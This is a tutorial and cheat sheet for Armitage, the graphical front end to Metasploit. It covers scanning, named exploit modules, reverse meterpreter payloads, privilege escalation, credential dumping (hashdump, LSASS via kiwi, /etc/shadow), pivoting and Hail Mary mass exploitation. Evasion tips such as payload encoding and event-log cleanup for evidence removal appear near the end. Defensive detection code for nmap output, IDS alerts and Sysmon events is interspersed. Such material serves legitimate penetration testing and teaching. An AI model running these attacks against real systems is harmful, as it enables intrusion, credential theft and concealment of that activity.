Armitage is a graphical user interface for Metasploit Framework that simplifies penetration testing by visualizing target networks, automatically recommending exploits, and enabling collaborative team-based attacks. It abstracts Metasploit’s command-line complexity while exposing advanced post-exploitation features through an intuitive visual interface.
```bash
# Install prerequisites (full JDK, not the headless package: Armitage is a Swing GUI)
sudo apt-get update
sudo apt-get install -y metasploit-framework postgresql openjdk-11-jdk
# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Download Armitage
wget http://www.fastandeasyhacking.com/download/armitage/armitage140728.tgz
tar xzf armitage140728.tgz
cd armitage
chmod +x armitage
```
```bash
# Install Metasploit Framework first
# Then download and extract Armitage
brew install metasploit-framework
wget http://www.fastandeasyhacking.com/download/armitage/armitage140728.tgz
tar xzf armitage140728.tgz
cd armitage
./armitage
```
```
# Ensure Metasploit Framework is installed
# Download Armitage executable or use installer
# Extract and run armitage.exe
# Ensure PostgreSQL service is running
```
```bash
# Initialize PostgreSQL database for Metasploit
sudo msfdb init
# Verify database connection (db_status reports "Connected to msf")
msfconsole -q -x "db_status; exit"
```
```bash
# Navigate to Armitage directory
cd /path/to/armitage
# Run Armitage (requires X11 on Linux)
./armitage
# Specify connection details if needed
./armitage --host 127.0.0.1 --port 55553
```
| Connection Method | Command | Description |
|---|---|---|
| Local RPC | Connect automatically | Auto-connects to localhost MSFRPCd |
| Remote RPC | Input host & port | Connect to remote Metasploit RPC server |
| Team Server | Use Team Server dialog | Collaborate with other analysts |
```bash
# Method 1: Use Armitage GUI
# 1. Hosts → New Window (or use nmap)
# 2. Select target network (e.g., 192.168.1.0/24)
# 3. Scan tab shows progress
# Method 2: Run nmap from command line before Armitage
# (write XML with -oX; a plain text redirect cannot be imported)
nmap -sV -O 192.168.1.0/24 -oX hosts.xml
# Method 3: MSFConsole integration
# Use Metasploit's auxiliary scanners before loading into Armitage
```
| Option | Purpose |
|---|---|
| Intense scan | Comprehensive OS detection & service version detection |
| Quick scan | Fast SYN scan for host discovery |
| Quick scan + UDP | Detect UDP services (DNS, SNMP, DHCP) |
| Custom | User-defined nmap arguments |
```bash
# Aggressive host discovery (Armitage imports these)
nmap -A -T4 192.168.1.0/24 -oX output.xml
# Service version detection
nmap -sV -p- 192.168.1.100
# OS fingerprinting
nmap -O 192.168.1.100
# UDP service discovery
nmap -sU -p 53,123,161,162,5353 192.168.1.100
# Specific service scan
nmap -p 21,22,25,80,139,445,3306 192.168.1.0/24
```
| Format | Command | Notes |
|---|---|---|
| Nmap XML | File → Import → Nmap XML | Recommended for automated import |
| Nessus | File → Import → Nessus file | Vulnerability scanner integration |
| Manual hosts | Hosts tab drag & drop | Manually add target IPs |
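Since the import path Armitage recommends is nmap's `-oX` XML, here is a small parser for that format, added as an illustration (it is not Armitage's own importer). The XML is a constructed sample in the nmap schema, trimmed to the elements the parser reads.

```python
"""Parser for nmap -oX output, the format Armitage imports via File -> Import
-> Nmap XML. Added example, not Armitage's importer; the XML is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample in the nmap XML schema, trimmed to the elements used here.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -O -oX out.xml 192.168.1.0/24">
<host><status state="up"/><address addr="192.168.1.100" addrtype="ipv4"/>
 <ports>
  <port protocol="tcp" portid="445"><state state="open"/>
   <service name="microsoft-ds" product="Windows 7 - 10 microsoft-ds"/></port>
  <port protocol="tcp" portid="3389"><state state="open"/>
   <service name="ms-wbt-server"/></port>
  <port protocol="tcp" portid="135"><state state="filtered"/>
   <service name="msrpc"/></port>
 </ports>
 <os><osmatch name="Microsoft Windows 10" accuracy="96"/></os>
</host>
<host><status state="down"/><address addr="192.168.1.101" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"os": name-or-None, "services": [(port, proto, name, product)]}}
    for hosts that are up, keeping only open ports: the same view Armitage
    shows in its Hosts and Services tabs after an import."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # down hosts and IPv6-only entries are skipped
        osmatch = host.find("os/osmatch")  # first (best) OS guess, if any
        entry = {"os": osmatch.get("name") if osmatch is not None else None,
                 "services": []}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports carry no service to track
            svc = port.find("service")
            entry["services"].append((int(port.get("portid")),
                                      port.get("protocol"),
                                      svc.get("name") if svc is not None else None,
                                      svc.get("product") if svc is not None else None))
        hosts[addr.get("addr")] = entry
    return hosts
```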
```
# Once hosts are imported in Armitage:
# 1. Right-click target → Scan
# 2. View Services tab for discovered ports/services
# 3. Right-click services → Search exploits
# 4. Armitage ranks matches by success probability
```
| Discovered Port | Common Service | Typical Vulnerabilities |
|---|---|---|
| 21 | FTP | Anonymous login, weak credentials |
| 22 | SSH | Weak key exchange, version exploits |
| 25 | SMTP | Open relay, user enumeration |
| 80 | HTTP | Web application vulnerabilities |
| 139 | NetBIOS | SMB exploits, null sessions |
| 445 | SMB | EternalBlue, RCE exploits |
| 3306 | MySQL | Weak credentials, RCE |
| 3389 | RDP | BlueKeep, credential attacks |
```
# Automatic recommendation (easiest)
# 1. Right-click target host
# 2. Select "Scan for exploits"
# 3. Armitage queries available exploits
# 4. View Hail Mary or filtered results
# Manual exploit search
# 1. Modules tab on left
# 2. Search by name or technique
# 3. Highlight → View info & options
```
| Step | Action | Description |
|---|---|---|
| 1 | Target selection | Right-click host or service |
| 2 | Exploit search | Auto-populate module based on service |
| 3 | View options | RHOST, RPORT, payload auto-filled |
| 4 | Set payload | Default usually meterpreter/reverse_tcp |
| 5 | Configure LHOST | Auto-detected, verify correctness |
| 6 | Launch | Click "Launch" to execute exploit |
| 7 | Interact | New shell/meterpreter session created |
```
# Windows SMB (445)
# Module: exploit/windows/smb/ms17_010_eternalblue
# Payload: windows/meterpreter/reverse_tcp
# Apache Struts (8080)
# Module: exploit/multi/http/struts2_rest_xstream
# Payload: java/meterpreter/reverse_tcp
# MySQL (3306)
# Module: exploit/multi/mysql/mysql_udf_payload
# Payload: linux/x86/meterpreter/reverse_tcp
# RDP (3389)
# Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Payload: windows/meterpreter/reverse_tcp
```
| Payload Type | Best For | LHOST/LPORT Setup |
|---|---|---|
| reverse_tcp | Most reliable | LHOST = attacker IP, LPORT = free port |
| bind_tcp | Firewall bypass | RPORT = listener on target |
| reverse_http | Proxy evasion | LHOST = attacker IP, LPORT = 80/443 |
| staged | Small shellcode | Uses multiple packets |
```
# Once exploit succeeds, meterpreter session opens automatically
# Right-click session in Targets tab → Interact
# Common post-ex commands in meterpreter shell:
sysinfo          # System information
getuid           # Current user
getsystem        # Attempt privilege escalation
ps               # List processes
migrate [PID]    # Migrate to process (for stability)
screenshot       # Capture desktop
webcam_snap      # Capture webcam
hashdump         # Extract SAM hashes (Windows)
```
| Command Type | Purpose | Syntax |
|---|---|---|
| Interactive shell | Direct command execution | `shell` in meterpreter |
| Command execution | Single command | `execute -c cmd /c ipconfig` |
| Script execution | Run batch/PowerShell | `execute -f script.ps1` |
| Background jobs | Non-blocking commands | `background` to suspend session |
```
# Check current privileges (meterpreter)
getuid
# Attempt local privilege escalation (meterpreter)
getsystem
# Specific escalation modules, e.g. a UAC bypass (run from msfconsole)
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
# Extract credentials (meterpreter)
run post/windows/gather/hashdump
run post/windows/gather/credentials/credential_collector
# Dump LSASS process (Mimikatz-style)
load kiwi
creds_all
```
```
# From compromised host, discover internal network
ipconfig /all    # (Windows) View network config
ifconfig         # (Linux) View network config
# Use Armitage to add discovered internal hosts
# Route through current session for further exploitation
# Create pivot through meterpreter (msfconsole; [SESSION_ID] is the session number)
route add 10.0.0.0 255.255.255.0 [SESSION_ID]
# Run scanners through pivot (msfconsole)
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.0.0.0/24
run
# Download files from target (meterpreter)
download C:\Windows\win.ini /tmp/win.ini
# Upload malware/tools
upload /path/to/tool.exe C:\Windows\Temp\tool.exe
# Traverse directories
cd C:\Users\Admin\Documents
ls
pwd
```
Cortana is Armitage’s built-in scripting language for automation and customization.
```
# Basic syntax (Cortana is built on the Sleep language)
on event_name {
    # code here; event arguments arrive as $1, $2, ...
}

# Example: custom menu item on the targets view
popup targets {
    item "Custom Action" {
        # $1 is the array of selected hosts
        foreach $host ($1) {
            println("Target: $host");
        }
    }
}

# React to a newly discovered host
on host_add {
    # $1 is the address of the host that was just added
    println("Found target: $1");
    show_message("New host detected: $1");
}

# Custom command menu on a meterpreter session
popup meterpreter {
    item "Run Privilege Escalation" {
        # $1 is the id of the selected session; m_cmd sends it a meterpreter command
        local('$session');
        $session = $1;
        m_cmd($session, "getsystem");
    }
}
```
| Method | Command | Notes |
|---|---|---|
| GUI menu | Armitage → Scripts → Load | Browse and load Cortana scripts |
| Startup | Add to ~/.armitage/startup.cortana | Auto-load on launch |
| Console | scripts/cortana/ directory | Pre-packaged with Armitage |
```bash
# Server machine runs MSFRPCd (Armitage can start one for you when
# connecting locally; to start it by hand:)
msfrpcd -U msf -P password123 -a 127.0.0.1
# Alternative: standalone team server (starts msfrpcd and the shared server)
./teamserver 192.168.1.100 password123
# Port default: 55553
# Each analyst connects via Armitage GUI
# 1. Click "Connect to Team Server"
# 2. Input server IP: 192.168.1.100
# 3. Input port: 55553
# 4. Input password: password123
# 5. Click "Connect"
```
| Feature | Behavior | Use Case |
|---|---|---|
| Shared targets | All analysts see hosts | Coordinate scanning |
| Session sharing | All can interact with shells | Collaborative post-ex |
| Chat | In-Armitage messaging | Team communication |
| Event logging | Audit trail of actions | Accountability |
| Permissions | Password-based access | Simple auth |
```
# Use VPN for team server communication
# Restrict team server to trusted IPs only
# Change default password regularly
# Log all team activities
# Use separate analyst accounts where possible
```
Hail Mary is Armitage’s fully automated exploitation mode that attempts all available exploits against discovered hosts ranked by success probability.
```
# In Armitage GUI:
# 1. Hosts → Select target(s)
# 2. Attacks → Hail Mary
# 3. Configure payload (meterpreter usually default)
# 4. Click "Launch"
# 5. Watch automation run exploits systematically
# Edit Hail Mary options:
# Armitage → Preferences → Hail Mary
# - Set threads for parallel exploitation
# - Enable/disable specific exploit types
# - Configure payload handler port
```
| Element | Function | Notes |
|---|---|---|
| Target list | Shows exploitation status | Color coding: pending, running, success |
| Logs | Detailed attempt history | Review failed exploits |
| Sessions | New shell/meterpreter created | Auto-interact on success |
| Output | Real-time feedback | Watch exploitation unfold |
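From the defender's side, Hail Mary has a recognisable shape in IDS alerts: one source fires many distinct exploit signatures at one host within seconds, unlike a manual retry of a single exploit. This added detector is not part of Armitage; the alert line format and every line in it are constructed.

```python
"""Detection of Hail-Mary-style mass exploitation from IDS alert lines.
Added example from a defender's side, not part of Armitage; the log format
and every line below are constructed, not real sensor output."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed alert log: "<ISO time> <src> -> <dst>:<port> <signature>".
SAMPLE_ALERTS = """\
2024-03-01T10:00:01 10.10.5.7 -> 192.168.1.100:445 EXPLOIT SMB MS17-010 attempt
2024-03-01T10:00:02 10.10.5.7 -> 192.168.1.100:445 EXPLOIT SMB MS08-067 attempt
2024-03-01T10:00:03 10.10.5.7 -> 192.168.1.100:3389 EXPLOIT RDP CVE-2019-0708 attempt
2024-03-01T10:00:04 10.10.5.7 -> 192.168.1.100:8080 EXPLOIT Struts OGNL attempt
2024-03-01T10:00:05 10.10.5.7 -> 192.168.1.100:3306 EXPLOIT MySQL UDF attempt
2024-03-01T10:00:06 10.10.5.7 -> 192.168.1.100:80 EXPLOIT HTTP header attempt
2024-03-01T10:05:00 10.10.9.2 -> 192.168.1.100:445 EXPLOIT SMB MS17-010 attempt
2024-03-01T11:00:00 10.10.9.2 -> 192.168.1.100:445 EXPLOIT SMB MS17-010 attempt
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (.+)$")


def parse_alerts(text):
    """Yield (time, src, dst, port, signature) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # malformed lines are skipped rather than crashing the detector
            t, src, dst, port, sig = m.groups()
            yield datetime.fromisoformat(t), src, dst, int(port), sig


def find_mass_exploitation(text, window_s=60, min_sigs=4):
    """Return {(src, dst): distinct_signatures} for pairs where one source fires
    >= min_sigs distinct signatures at one destination inside a sliding window
    of window_s seconds. One signature repeated (a manual retry) never qualifies."""
    by_pair = defaultdict(list)
    for t, src, dst, port, sig in parse_alerts(text):
        by_pair[(src, dst)].append((t, sig))
    hits = {}
    for pair, events in by_pair.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            window = [s for t, s in events[i:] if t - t0 <= timedelta(seconds=window_s)]
            distinct = len(set(window))
            if distinct >= min_sigs:
                hits[pair] = max(distinct, hits.get(pair, 0))
    return hits
```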
```
# Critical for meterpreter stability
# Migrate to stable system process (not user process)
# List processes
ps
# Migrate (avoids session death if app closes)
migrate 892    # explorer.exe on Windows
# Best targets: svchost.exe, services.exe, lsass.exe
```
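Both the migration above and the earlier `load kiwi` / `creds_all` LSASS dump leave Sysmon traces: Event ID 8 (CreateRemoteThread into a system process) and Event ID 10 (ProcessAccess on lsass.exe with a memory-read right). This added detection example is not part of Armitage or Metasploit; the events and the allowlist are constructed.

```python
"""Sysmon-based detection for two post-exploitation steps on this page:
meterpreter 'migrate' (Event ID 8, CreateRemoteThread into a system process)
and kiwi/creds_all style LSASS reads (Event ID 10, ProcessAccess on lsass.exe).
Added example from a defender's side, not part of Armitage or Metasploit;
the events below are constructed records, not real Sysmon output."""

SYSTEM_TARGETS = {"lsass.exe", "svchost.exe", "services.exe"}
# Processes that legitimately open lsass (EDR, AV). Constructed allowlist.
LSASS_ALLOWED_SOURCES = {r"C:\Program Files\Windows Defender\MsMpEng.exe"}
PROCESS_VM_READ = 0x0010  # GrantedAccess bit needed to read LSASS memory

# Constructed Sysmon-like events, already parsed into dicts. The lsass read
# from svchost.exe is what a session that migrated into svchost looks like.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\Admin\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
]


def basename(path):
    """Case-insensitive file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a list of (rule, source_image) findings, in event order."""
    findings = []
    for ev in events:
        src, tgt = ev.get("SourceImage", ""), ev.get("TargetImage", "")
        if ev["EventID"] == 8 and basename(tgt) in SYSTEM_TARGETS:
            # Remote thread creation into a system process: the migrate pattern.
            findings.append(("remote_thread_into_system_process", src))
        elif ev["EventID"] == 10 and basename(tgt) == "lsass.exe":
            access = int(ev.get("GrantedAccess", "0"), 16)
            # Only handles that can read memory, from non-allowlisted sources.
            if access & PROCESS_VM_READ and src not in LSASS_ALLOWED_SOURCES:
                findings.append(("lsass_memory_read", src))
    return findings
```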
| Module Category | Examples | Purpose |
|---|---|---|
| Encoders | x86/shikata_ga_nai | Obfuscate payloads |
| Payloads | meterpreter/reverse_tcp | Shellcode delivery |
| Post | windows/gather/hashdump | Post-ex automation |
| Auxiliary | scanner/smb/smb_version | Information gathering |
```
# Add custom-written Metasploit modules:
# 1. Place module in ~/.msf4/modules/exploits/custom/
# 2. Reload Armitage
# 3. Module appears in Modules tree
# 4. Use like any built-in exploit
# Example path:
~/.msf4/modules/exploits/custom/my_custom_exploit.rb
```
```
# 1. Network Discovery
#    Hosts → New Hosts Window
#    Input target range: 192.168.1.0/24
#    Select "Intense scan"
#    Wait for nmap results
# 2. Service Enumeration
#    Right-click each host → Scan (or import nmap XML)
#    Review Services tab for vulnerable services
# 3. Vulnerability Assessment
#    Right-click service → Search exploits
#    Review Hail Mary recommendations
# 4. Exploitation
#    Select exploit → Configure payload → Launch
#    Wait for meterpreter session
# 5. Post-Exploitation
#    Right-click session → Interact
#    Execute privilege escalation, credential dumping, pivoting
# 6. Network Pivot & Lateral Movement
#    Repeat steps 1-5 for internal network
#    Use current session as pivot proxy
```
```
# 1. Identify web servers (port 80, 443, 8080, 8443)
# 2. Use browser + Burp/OWASP ZAP alongside Armitage
# 3. Look for web-related exploits:
#    - Apache Struts
#    - JBoss JMXInvokerServlet
#    - WebLogic exploits
# 4. Launch web app exploits from Armitage
# 5. Post-ex with meterpreter from successful web exploit
```
```
# Once shell obtained:
# Windows credential harvesting
hashdump                              # Extract SAM
run post/windows/gather/hashdump
load kiwi
creds_all                             # Mimikatz-style dump
# Linux credential harvesting
cat /etc/passwd                       # User enumeration
cat /etc/shadow                       # (if root) Password hashes
run post/linux/gather/hashdump
# Pass-the-hash attacks with harvested credentials
# Use exploit/windows/smb/psexec with NTLM hash
```
| Issue | Cause | Solution |
|---|---|---|
| "MSFRPCd connection refused" | Metasploit not running | Start msfconsole or teamserver |
| Exploit fails silently | Target not vulnerable | Try different exploit or verify service version |
| Meterpreter session dies | Process terminated | Use migrate to switch processes |
| GUI freezes | Long-running operation | Increase Java heap size: -Xmx1024m |
| Nmap import fails | Malformed XML | Re-run nmap with -oX flag |
```
# Increase Java memory for large networks (the armitage launcher script passes
# its arguments to Armitage, not to the JVM, so set the heap on java directly)
java -Xmx2048m -jar armitage.jar
# Reduce thread count for stability
# Armitage → Preferences → General → Thread count = 5
# Clear database if corrupted
sudo msfdb delete
sudo msfdb init
# Enable debug output
./armitage --verbose
# Monitor Metasploit console directly
msfconsole
jobs -l    # View background jobs
```
```
# Obfuscate payloads
use encoder/x86/shikata_ga_nai
set PAYLOAD windows/meterpreter/reverse_tcp
set ITERATIONS 5    # Multiple encoding passes
# Use encrypted channels
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 443       # HTTPS default (less suspicious)
# Staged vs. stageless payloads
# Staged = smaller initial shellcode, multi-stage download
# Stageless = larger but single-stage (better for detection evasion)
```
| Practice | Reason | Implementation |
|---|---|---|
| Use VPN for team server | Hide attacker IP | Route all connections through VPN |
| Separate test network | Avoid detection | Run Armitage on isolated network |
| Log cleanup | Evidence removal | (post-exploitation) Clear event logs |
| Session rotation | Avoid detection | Periodically re-exploit for new sessions |
| Resource | URL | Purpose |
|---|---|---|
| Armitage Website | fastandeasyhacking.com | Official documentation & tutorials |
| Metasploit docs | docs.metasploit.com | Framework reference |
| MITRE ATT&CK | attack.mitre.org | Exploit technique mapping |
| Exploit-DB | exploit-db.com | Exploit database |